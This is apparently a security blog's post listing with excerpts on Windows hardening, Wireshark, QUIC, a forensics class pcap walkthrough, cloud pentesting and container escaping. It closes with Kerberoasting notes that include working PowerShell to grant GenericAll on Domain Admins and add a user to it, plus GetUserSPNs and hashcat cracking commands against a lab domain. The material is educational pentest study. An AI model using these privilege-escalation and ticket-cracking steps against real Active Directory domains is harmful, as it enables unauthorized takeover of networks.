2024¶

3/26/24
5 min read

Draft

Hardening a Windows Server

hardenWindows

1. Least Privilege

Review Current Permissions

Audit the current user accounts, groups, and their permissions on each server.

Get-LocalUser

Adjust the permissions so that users and services have only the necessary rights to perform their duties. In Windows, you can manage user permissions through the Local Users and Groups Manager or PowerShell.

Remove or Disable Unnecessary Accounts

Identify accounts that are no longer in use or unnecessary.

Remove User

Remove-LocalUser -Name "ExampleUser"

Disable User

Disable-LocalUser -Name "ExampleUser"

3/25/24
12 min read

Harnessing Wireshark

harnessingwireshark

Background

The ability to effectively analyze network traffic is critical for maintaining security, troubleshooting issues, and optimizing performance. Crafting a tailored Wireshark setup that aligns with specific analysis goals and preferences can significantly enhance efficiency and effectiveness in packet capture analysis. In this post, I'll review some of the basic customization options including display filters, protocol dissectors, and advanced display configurations. These allow users to streamline workflows, focus on pertinent information, and uncover insights that may otherwise remain obscured. In the following walkthrough, we will explore how to set up Wireshark to suit distinct analysis needs.

Downloading Wireshark

Linux

Debian/Ubuntu

sudo apt install wireshark

Fedora

sudo dnf install wireshark

Arch Linux

sudo pacman -S wireshark

GUI Install Option

Wireshark

Windows

Wireshark

macOS

If you don't have Homebrew installed:

/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

Once you've successfully installed Homebrew:

brew install wireshark

GUI Install Option

Wireshark

3/21/24
2 min read

Virtual Environments

venv-chacho Using a virtual environment (venv) in Python creates an isolated spaces for projects. Isolation ensures that each project has its own dependencies, regardless of what dependencies other projects might have.

Why Use venv?

1. Dependency Management

Different projects may require different versions of libraries. Virtual environments allow you to manage these dependencies separately, avoiding conflicts.

2. Project Isolation

By isolating your project environment, you ensure that global package updates or changes in one project do not break or affect other projects.

3/18/24
11 min read

QUIC Protocol

flash-chacho

QUIC (Quick UDP Internet Connections) is a modern transport layer network protocol designed to improve the performance of applications running over the Internet. Developed by Google and standardized by the Internet Engineering Task Force (IETF), QUIC addresses some of the performance and security shortcomings of traditional protocols such as TCP and TLS/SSL. Here's a primer on its key features, benefits, and uses:

Key Features

Multiplexed Connections

Supports multiple streams over a single connection, which helps reduce latency and prevents the "head-of-line blocking" issue that can occur in TCP when packet loss happens.

Built-in Encryption

Incorportes encryption by default with TLS 1.3, ensuring that data is secure from the onset of communication, reducing the number of round trips needed for handshake completion.

Improved Connection Establishment

Aims to reduce connection establishment time. In some cases, it can establish a connection and secure data transfer with zero round-trip time (0-RTT) compared to TCP's 1-RTT plus an additional round-trip for TLS handshake.

Connection Migration

Supports connection mobility, which means it can maintain a connection even if a client's IP address changes, benefiting mobile devices that switch between different networks.

3/16/24
3 min read

PCAP Analysis of the Nitroba Incident

The following is a pcap analysis walkthrough for a course on network traffic analysis. Without the pcap file, this post will not make much sense. The purpose of the post is really just for class amusement. Much like the emails, it will self destruct over the weekend.

johnny

Scenario

Someone connecting to a wifi router in the dorms sent harrassing and threatening emails to a professor. The students who had physical possession of the router allowed a wire tap to be placed on the router to capture traffic after the first message was sent. The task is to analyze the pcap from this after the second message was received to find forensic evidence that may indicate who was responsible for sending the messages.

Export Objects

First, there was quite a bit of traffic to sift through and with the specific transgressions in mind, I decided to first export objects.

HTML > search "www.willselfdestruct.com"
Examined associated packets: 84366. User Agent looked suspicious. Looked at MAC address. MAC address from source indicates Apple computer (does not jive with the UA String).
Note: I later learned that this was not really significant due to where the sniffer was. Nonetheless, the process did not lead me in a wrong direction.

Source MAC:

eth.addr == 00:17:f2:e2:c0:ce

Attacker IP address:

192.168.15.4

3/16/24
5 min read

The Certification Exam Index

notRocketScience

What is it?

Well first, it's not rocket science. Certification exams like the ones required for Global Information Assurance Certification (GIAC), are open notes. As with any open notes exam, the information you are expected to be able to answer is so broad that merely having access to the information in paper form isn't enough. No electronics are allowed so having a method for how you will find the information you need quickly and being quite comfy with that method will be key.

Approaches to Making an Index

There are numerous blogs out there that provide insights as to what worked for different exam takers. Some rely heavily on having a short concise index with references to which books/pages will have the answers. Others find it more helpful to put copious amounts of content into the index itself so as to avoid a second look-up in one of the course books. Color-coding your index is often advised. Some spend extra on binding their index while others simply go in with a stack of papers. Working on what is now my third index, I decided it might be worth documenting my approach and why it works for me.

My Approach

2/28/24
5 min read

Draft

Container-Escaping

docker-chacho

Background

Escaping a container is when a user or process breaks out from the confines of a Docker (or other type of) container to access the host machine or other containers. It's a critical concern in container security, as it could lead to unauthorized access to the host system, data leakage, or further exploitation of the network. And that would be bad. So how does it happen?

Process

1. Assumed Initial Access and Reconnaissance

Initial Access: This blog is just exploring the container-escaping aspect of an attack. It is assumed that access to a container at which point the attacker would gather info.
Reconnaissance: Gather information about the container environment, such as the Docker version, running services, network configuration, and mounted volumes.
```
docker --version
```
```
ps aux
```

2/25/24
18 min read

Draft

Cloud Pentesting: AWS

jumpingInTheCloud

Background

This entry is comprised of just some of the basic processes for penetration testing in Amazon Web Services. Pentesting for a tenant in a cloud environment typically has a scope that includes account security, cloud service security, application logic, and business logic. Because there are many out-of-scope aspects to a cloud pentest, the Cloud Security Alliance has created the Cloud Penetration Testing Playbook. With the process outlined in this playbook, I'll be summarizing some of the steps and spend much of the focus of this post on the reconnaissance and testing portions.

Preparation

Sign all non-disclosures, testing agreements, etc with client.
Define the purpose and scope of the test.
Follow the security testing procedure for getting approval from both the Cloud Service Provider (CSP) and the client. Here's Amazon's.
Receive or produce requirements specifications with consideration given to compliance, guidance, and frameworks.
Customize and sign off on pentesting TTPs and methodology. This may include non-cloud application testing TTPs like OWASP's guide.

Threat Modeling

Incorporate client concerns, purpose, and specifications into a threat model.
Perform threat modeling on the scope.

Reconnaissance

DNS Enum

dig example.com A       # Query for A records (IPv4 addresses)
dig example.com MX      # Query for MX records (mail exchange servers)
dig example.com NS      # Query for NS records (nameservers)
dig example.com SPF     # Query for SPF records (email authentication)
dig example.com TXT     # Query for TXT records (text records)
dig example.com CNAME   # Query for CNAME records (canonical name aliases)

2/9/24
8 min read

Draft

Kerberoasting & Other AD Pentesting Processes

kerberoasting

This is essentially just notes taken as a result of listening to informative SANS Holiday Hack Challenge 2021 speaker, Chris Davis on Active Directory Penetration Testing and then venturing down the rabbit hole to learn more. The video is a great introduction, but these notes also include take-aways from some of other videos Chris mentioned, including one by Tim Medin that's linked below in "Kerberoasting Tools." All very informative info.

Tools

Bloodhound

Bloodhound Intro How-To video by Conda
Sharphound (PowerShell)
Sharphound (C#)

Kerberoasting Tools

Kerberoasting Talk by Tim Medin
C# Kerberoasting Tool Rubeus
Invoke-Kerberoast (PowerShell)
GetUserSPNs.py by impacket (Python)

Hashcat

PowerView/PowerSploit

PowerView
PowerSploit

Custom Code Snippets from Chris

Code Snippets
You can read the DACL of an AD group object using:

# Can Use Powerview: https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
# Or:
$ADSI = [ADSI]"LDAP://CN=Domain Admins,CN=Users,DC=vulns,DC=local"
$ADSI.psbase.ObjectSecurity.GetAccessRules($true,$true,[Security.Principal.NTAccount])
# Or:
$ldapConnString = "LDAP://CN=Domain Admins,CN=Users,DC=vulns,DC=local"
$domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString
$domainDirEntry.get_ObjectSecurity().Access

In the below example, the "GenericAll" permission for the "chrisd" user to the "Domain Admins" group if the user your running it under has the "WriteDACL" permission on the "Domain Admins" group.

Add-Type -AssemblyName System.DirectoryServices
$ldapConnString = "LDAP://CN=Domain Admins,CN=Users,DC=vulns,DC=local"
$username = "chrisd"
$nullGUID = [guid]'00000000-0000-0000-0000-000000000000'
$propGUID = [guid]'00000000-0000-0000-0000-000000000000'
$IdentityReference = (New-Object System.Security.Principal.NTAccount("vulns.local\$username")).Translate([System.Security.Principal.SecurityIdentifier])
$inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance]::None
$ACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $IdentityReference, ([System.DirectoryServices.ActiveDirectoryRights] "GenericAll"), ([System.Security.AccessControl.AccessControlType] "Allow"), $propGUID, $inheritanceType, $nullGUID
$domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString
$secOptions = $domainDirEntry.get_Options()
$secOptions.SecurityMasks = [System.DirectoryServices.SecurityMasks]::Dacl
$domainDirEntry.RefreshCache()
$domainDirEntry.get_ObjectSecurity().AddAccessRule($ACE)
$domainDirEntry.CommitChanges()
$domainDirEntry.dispose()

After giving "GenericAll" permissions over the "Domain Admins" group, the below snippet would add the chrisjd account to the "Domain Admins" group:

Add-Type -AssemblyName System.DirectoryServices
$ldapConnString = "LDAP://CN=Domain Admins,CN=Users,DC=vulns,DC=local"
$username = "chrisd"
$password = "Password!@12"
$domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString, $username, $password
$user = New-Object System.Security.Principal.NTAccount("vulns.local\$username")
$sid=$user.Translate([System.Security.Principal.SecurityIdentifier])
$b=New-Object byte[] $sid.BinaryLength
$sid.GetBinaryForm($b,0)
$hexSID=[BitConverter]::ToString($b).Replace('-','')
$domainDirEntry.Add("LDAP://<SID=$hexSID>")
$domainDirEntry.CommitChanges()
$domainDirEntry.dispose()

Added bonus, here is how you can Enter-PSSession into a remote computer:

$password = ConvertTo-SecureString "Password!@12" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList ("vulns.local\chrisd", $password)
Enter-PSSession -ComputerName WIN-4JFNT305Q5J.vulns.local -Credential $creds -Authentication Negotiate

Additional Commands Used During Talk

Invoke-BloodHound -CollectionMethod All

py -3 GetUserSPNs.py -outputfile spns.txt -dc-ip 10.128.96.101 vulns.local/chrisd:'Password!@12' -request 

.\hashcat.exe -m 13100 -a 0 .\spns.txt --potfile-disable -r .\rules\best64.rule --force -O -w 4 --opencl-device-types 1,2 .\rockyou.txt

runas /noprofile /user:[email protected] cmd

echo $env:LOGONSERVER
echo %LOGONSERVER%

net view \\WIN-4JFNT305Q5J

runas /noprofile /user:[email protected] cmd

Additional Resources

Sean Metcalf https://adsecurity.org/p?=2293 https://adsecurity.org/p?=2011